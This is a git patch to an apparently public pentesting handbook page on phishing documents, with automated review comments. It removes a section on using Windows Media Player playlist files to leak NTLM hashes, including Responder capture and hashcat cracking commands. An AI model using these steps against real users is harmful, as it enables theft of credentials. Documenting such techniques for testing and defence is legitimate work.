From 9a95bc80a3c87139a5eecd7fcca0ef2cd1276e1f Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sun, 7 Sep 2025 23:21:49 +0200 Subject: [PATCH] Update phishing-documents.md --- .../phishing-documents.md | 34 +------------------ 1 file changed, 1 insertion(+), 33 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index cb288e2fd..e08280215 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -160,38 +160,6 @@ There are several ways to **force NTLM authentication "remotely"**, for example, ../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md {{#endref}} -### Windows Media Player playlists (.ASX/.WAX) to coerce NTLM - -If a workflow automatically previews media (e.g., HR reviewing uploads) using Windows Media Player, you can leak Net-NTLMv2 by providing a playlist that references a UNC path. When WMP loads the entry, it attempts SMB access with implicit NTLM authentication. - -Example ASX payload (also supported by .WAX): - -```xml - - Leak - - - - - -``` - -Collect and crack the hash: - -```bash -# Capture Net-NTLMv2 -sudo Responder -I -# Or run via uv if you manage dependencies with it -# sudo uv run --script Responder.py -I - -# Crack (hashcat auto-detects NetNTLMv2, mode 5600) -hashcat ntlm.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -``` - -Notes -- Use ntlm_theft to generate ready-made WMP coercion files: https://github.com/Greenwolf/ntlm_theft -- If NTLM signing/SMB egress is blocked or NTLM disabled, this won’t work. Otherwise, it’s effective when targets auto-open or preview uploaded playlists. - ### NTLM Relay Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**: 
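Review bot: Removing the whole "Windows Media Player playlists (.ASX/.WAX) to coerce NTLM" section leaves orphaned material elsewhere in this file: the next hunk's context still lists the "[ntlm_theft – NTLM coercion file generator]" and "[Responder]" reference entries under "Hunting/IOCs", which only made sense alongside the deleted text. Either prune those two reference lines in the same change or keep a one-line pointer to the existing "../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md" reference so the Hunting/IOCs entries still have something in this file to attach to. The commit message "Update phishing-documents.md" also gives no reason for the deletion (moved to the ntlm page, duplicated content, or judged out of scope?); a short rationale would help anyone later searching for where the WMP/NTLM coercion guidance went. The removed section's `bash` block also carried the detection-relevant caveat that the technique fails when NTLM is disabled or SMB egress is blocked; if that defensive note is not preserved elsewhere, consider keeping it.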
@@ -256,4 +224,4 @@ Hunting/IOCs - [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft) - [Responder](https://github.com/lgandx/Responder) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}}
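Review bot: This hunk is a whitespace-only fix (adding the missing newline after the `{{#include ../../banners/hacktricks-training.md}}` line, resolving the "No newline at end of file" warning), which is fine and consistent with the rest of the repository, but it is unrelated to the content deletion in the first hunk and is not mentioned in the commit message; either note it there or land it as its own commit so the history separates the editorial removal from the formatting fix.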